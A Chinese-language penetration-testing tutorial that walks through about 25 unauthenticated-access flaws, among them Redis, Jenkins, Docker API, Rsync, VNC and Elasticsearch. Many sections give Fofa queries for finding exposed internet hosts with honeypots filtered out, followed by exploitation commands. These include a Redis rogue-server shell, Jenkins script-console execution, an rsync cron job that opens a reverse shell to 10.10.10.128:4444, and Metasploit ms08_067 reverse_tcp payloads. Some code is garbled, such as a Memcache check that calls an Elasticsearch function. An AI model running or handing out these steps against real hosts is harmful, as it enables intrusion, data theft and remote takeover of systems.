一: Redis未授权访问漏洞
步骤一:进入vulhub目录使用以下命令启动靶机…
进入目录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
步骤二:在Kali上安装redis程序进行服务的链接.
#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176 -p 6379
#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使用select num可以查看键值数据。
(5)设置变量:set test“whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称
步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞…下载以下攻击项目…
https://github.com/n0b0dyCN/redis-rogue-server
步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境
python3 redis-rogue-server.py --rhost 192.168.4.176 --lhost 192.168.4.108
二: MongoDB未授权访问漏洞
步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境…
拉取镜像:docker pull mongo
启动容器:docker run -d -p 27017:27017 --name mongodb mongo
查看容器:docker ps -a
步骤二:使用Nmap的插件脚本进行扫描…发现存在未授权访问漏洞.
# 扫描命令
nmap -p 27017 --script mongodb-info 192.168.4.176
步骤三:也可尝试使用MSF中的模块进行漏洞测试…不需要认证即可直接连接
use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 192.168.4.128
set threads 15
exploit
步骤四:即存在未授权访问漏洞使用Navicat进行连接
三: Memcached未授权访问漏洞
步骤一:下载Memcached程序并执行以下命令…启动Memcached漏洞环境
#emcached程序下载
https://www.121down.com/soft/softview-28366.html
https://www.runoob.com/memcached/window-install-memcached.htm
#执行命令
memcached.exe -d install
memcached.exe -d start
步骤二:使用TeInet程序探测目标的11211端口.
#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造成敏感信息泄露
步骤三:使用Nmap程序的脚本进行漏洞扫描
nmap -p11211 --script memcached-info 192.168.4.199
步骤四:漏洞探测脚本(参考)
#!/usr/bin/env python
#_*_ coding:utf_8_*
def Memcache_check(ip, port=11211,timeout=5):
try:
socket.setdefaulttimeout(timeout)
s=socket.socket(socket.AF INET,socket.SOCK STREAM)
s.connect((ip,int(port)))
s.send("stats\r\n" )
result =s.recv(1024)
if "STAT version" in result:
print '[+]Memcache Unauthorized:'+ip+':'+str(port)
except Exception,e:
pass
if__name__=='__main__':
Elasticsearch check("127.0.0.1")
四: Zookeeper未授权访问漏洞
步骤一:使用以下Fofa语法搜索资产信息.
port="2181"
步骤二:在Kali中使用以下命令进行未授权访问漏洞测试,
echo envi | nc ip port
my:
3.5.192.161 2181
步骤三:可使用Zookeeper可视化管理工具进行连接…
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
五: Jenkins未授权访问漏洞
步骤一:使用以下fofa语法进行产品搜索.
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
步骤二:在打开的URL中…点击 Manage Jenkins–>ScritpConsole 在执行以下命令
#执行命令
println "whoami" .execute().text
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php
六: Jupyter NoteBook未授权访问漏洞
步骤一:通过以下fofa语法进行产品搜索…或使用vulhub启动靶场…
#fofa语法
"Jupyter Notebook" && port="8888"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d
步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。
步骤三:从New->Terminal 新建一个终端,通过新建的终端可执行任意命令
#命令执行页面
http://ip/terminals/1
七、Elasticsearch未授权访问漏洞
步骤一:使用以下Fofa语法进行Elasticsearch产品搜索:
"Elasticsearch" && port="9200"
步骤二:存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆.
#目标地址
#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search 查看数据库敏感信息
http://localhost:9200/_nodes查看节点数据
步骤三:可按照上面查看节点信息等、
八、Kibana未授权访问漏洞
步骤一:使用以下Fofa语句搜索Kibana产品…并打开页面…
"kibana" && port="5601"
步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面.
#拼接路径
HTTP://{IP}/app/kibana#/
#eg
my:
http://ip:5601/app/kibana#/
http://ip:5601/app/home#/
http://ip:5601/app/kibana_overview#/
九、Docker Remote APl未授权访问漏洞*
步骤一:使用以下Fofa语句对Docker产品进行搜索…
port="2375"
步骤二:直接使用浏览器访问以下路径…
http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息
步骤三:使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像。
docker -H tcp://ip:2375 ps
docker -H tcp://ip:2375 version
docker -H tcp://ip:2375 exec -it 1f4 /bin/bash
操作思路:
docker pull 下载有Docker逃逸的容器下来d
ocker逃逸间接获取安装docker主机控制权限
十、Kubernetes Api Server未授权访问漏洞
步骤一:使用以下Fofa语法搜索Kubernetes产品…
port="8080" && app="Kubernetes"
步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API列表…
十一:Hadoop未授权访问漏洞
步骤一:使用以下FOFA语法进行Hadoop产品的搜索…
port="8088" && app="Hadoop"
步骤二:开启页面直接访问不经过用户密码验证…
http://ip:8088/cluster
十二:ActiveMQ未授权访问漏洞
步骤一:使用以下Fofa语法搜索产品…
body="ActiveMQ" && port="8161"
步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…
http://ip:8161/
http://ip/admin/
第一种
第二种
十三:RabbitMQ未授权访问漏洞
步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索…
port="15672"
port="15692"
port="25672"
步骤二:在打开的页面中可输入默认的账号和密码进行登陆
默认账号密码都是guest
http://ip15672/
http://ip:15672/
十四:Springboot Actuator未授权访问漏洞
Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点,原生端点主要有:
/dump -显示线程转储(包括堆栈跟踪)
/autoconfig -显示自动配置报告
/configprops-显示配置属性
/trace -显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown -关闭应用程序
/info - 显示应用信息
/metrics -显示当前应用的'指标"信息
/health - 显示应用程序的健康指标
/beans-显示Spring Beans的完整列表
/mappings-显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart-重新启动应用程序
步骤一:使用以下Fofa语句搜索资产并打开页面访问.
icon_hash="116323821"
步骤二:当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了springboot 框架…
http://ip/
步骤三:拼接以下路径查看泄露的数据
访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录用户的操作请求,可以伪造cookie进行登录。
访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公网,那么造成的危害是巨大的。
git 项目地址泄露,这个一般是在/health 路径,比如如下站点,访问其 health 路径可探测到站点 git 项目地址。
my:
https://ip/
十五:FTP未授权访问漏洞(匿名登陆)
步骤一:对目标环境在资源管理器中用以下格式访问…如果该服务器开启了匿名登陆,则可直接进行内容查看…
ftp://ip:port/
十六:JBoss未授权访问漏洞
步骤一:使用以下语法搜索Jboss产品并打开其页面.
title="Welcome to JBoss"
步骤二:拼接以下路径且无需认证直接进入控制页面.
#拼接路径
http://ip:port/jmx-console/
步骤三:后续可以利用 jboss.deployment 部署shell
十七:Ldap未授权访问漏洞
步骤一:使用以下Fofa语法搜索使用Idap服务的产品.….并通过Ldapadmin可视化工具做连接验证…
#Fofa语法
port="389"
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/
步骤二:启动工具并测试存在未授权的LDAP服务…成功如下.
步骤三:连接目标LDAP服务并查看其内容
十八:Rsync未授权访问漏洞
步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!
# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up-d
步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…
# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules list
步骤三:使用命令进行链接并读取文件
执行命令#
rsync rsync://192.168.124.153:873/
rsync rsync://192.168.124.153:873/src/
步骤四:对系统中的敏感文件下载操作…/etc/passwd
# 执行命令
命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径
例如:rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/
# 结果查看
root@kali:/# cat /tmp/tmp/passwd
步骤五:上传文件…如果有相应的jsp/asp/php环境可以写一句话以phpinfo为例.
#攻击机操作
root@kali:/# echo "<?php phpinfo();?>" > phpinfo.php
root@kali:/# cat ./phpinfo.php
root@kali:/# rsync ./phpinfo.php rsync://192.168.124.153:873/src/home
# 靶机操作
root@4448da0725bd:/#ls
root@4448da0725bd:/# cd home/
root@4448da0725bd:/home#ls
phpinfo.php
root@4448da0725bd:/home# cat phpinfo.php
步骤六:反弹shell…在此可利用定时任务cron来反弹获取shell
# 1.查看定时任务
root@kali:/# rsync rsync://192.168.124.153:873/src/etc/crontab
# 2.将定时任务文件下载下来
rsync rsync://192.168.124.153/src/etc/crontab /tmp/tmp/crontab.txt
# 3.定时任务内容为,大致意思为每17分钟调用一次/etc/cron.hourly
# 4.创建shell文件
#!/bin/bash
/bin/bash i>& /dev/tcp/10.10.10.128/4444 0>&1
chmod 777 shell
#6.上传shell至靶机
root@kali:/#rsync -av /tmp/tmp/shell rsync://192.168.124.153:873/src/etc/cron.hourly
# 7.攻击机开启nc监听相应端口
nc -lvp 4444
十九:VNC未授权访问漏洞
步骤一:使用以下语句在Fofa上进行资产收集…
(port="5900") && (is_honeypot=false && is_fraud=false)
步骤二:可通过MSF中的模块进行检测与漏洞利用.
# VNC未授权检测
msf6>use auxiliary/scanner/vnc/vnc none_auth
msf6 auxiliary(scanner/vnc/vnc none_auth)>show options
msf6 auxiliary(scanner/vnc/vnc none_auth)>set rhosts 192.168.168.200-254
msf6 auxiliary(scanner/vnc/vnc none_auth)>set threads 100
msf6 auxiliary(scanner/vnc/vnc none_auth)>run
# VNC密码爆破
msf6>use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc login)>192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set rhosts 192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set blank_passwords true /密码爆破
msf6 auxiliary(scanner/vnc/vnc login)>run
# 加载攻击模块
msf6 exploit(windows/smb/ms08 067_netapi)>use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08 067_netapi)>set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08 067 netapi)>set rhosts 192.168.168.228
msf6 exploit(windows/smb/ms08 067 netapi)>set lhost 192.168.168.102
msf6 exploit(windows/smb/ms08 067 netapi)>set target 34
msf6 exploit(windows/smb/ms08 067 netapi)>exploit
获取会话后,直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 >use exploit/multi/handler
msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler)>set lhost 192.168.168.102
msf6 exploit(multi/handler)>set lport 4466
msf6 exploit(multi/handler)>exploit
步骤三:VNC链接验证…
vncviewer ipaddress
二十:Dubbo未授权访问漏洞
步骤一:使用以下语句在Fofa上进行资产收集.
(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)
步骤二:使用TeInet程序直接进行链接测试…
telnet IP port
二十一:NSF共享目录未授权访问
步骤一:使用以下语句在Fofa上进行资产收集.
"nfs"
步骤二:执行命令进行漏洞复现….
#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享目录
showmount -e ip
#挂载相应共享目录到本地
mount -t nfs ip:/grdata /mnt
#卸载目录
umount /mnt
二十二:Druid未授权访问漏洞
步骤一:使用以下语句在Fofa与Google上进行资产收集.
# Fofa
title="Druid Stat Index"
#PHPINFO页面
inurl:phpinfo.php intitle:phpinfo()info.php test.php
# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index'
步骤二:对访问到的站点查看…
http://ip:8010/druid/websession.html
http://ip:8088/pos/druid/websession.html
步骤三:Druid批量扫描脚本…
https://github.com/MzzdTOT/CVE-2021-34045
二十三:CouchDB未授权访问
步骤一:使用以下语句在Fofa上进行资产收集…或开启Vulhub靶场进行操作…
# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)
# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d
步骤二:执行未授权访问测试命令
curl 192.168.1.4:5984
curl 192.168.1.4:5984/_config
步骤三:反弹Shell参考…
https://blog.csdnnet/qq_45746681/article/details/108933389
二十四:Altassian Crowd未授权访问漏洞
(等待更新)
二十五:RTSP未授权访问漏洞
VLC media player,单击“媒体”选项,选择“打开网络串流”。
在弹出的窗口中输入网络URL:
rtsp://admin:888888@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1
username:用户名。例如admin。
password:密码。例如admin。
ip:为设备IP。例如 192.168.1.1.
port:端口号默认为554,若为默认可不填写。
channel:通道号,起始为1。例如通道2,则为channel=2
subtype:码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)
步骤一:使用以下语句在Fofa上进行资产收集.
(port=“554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp'
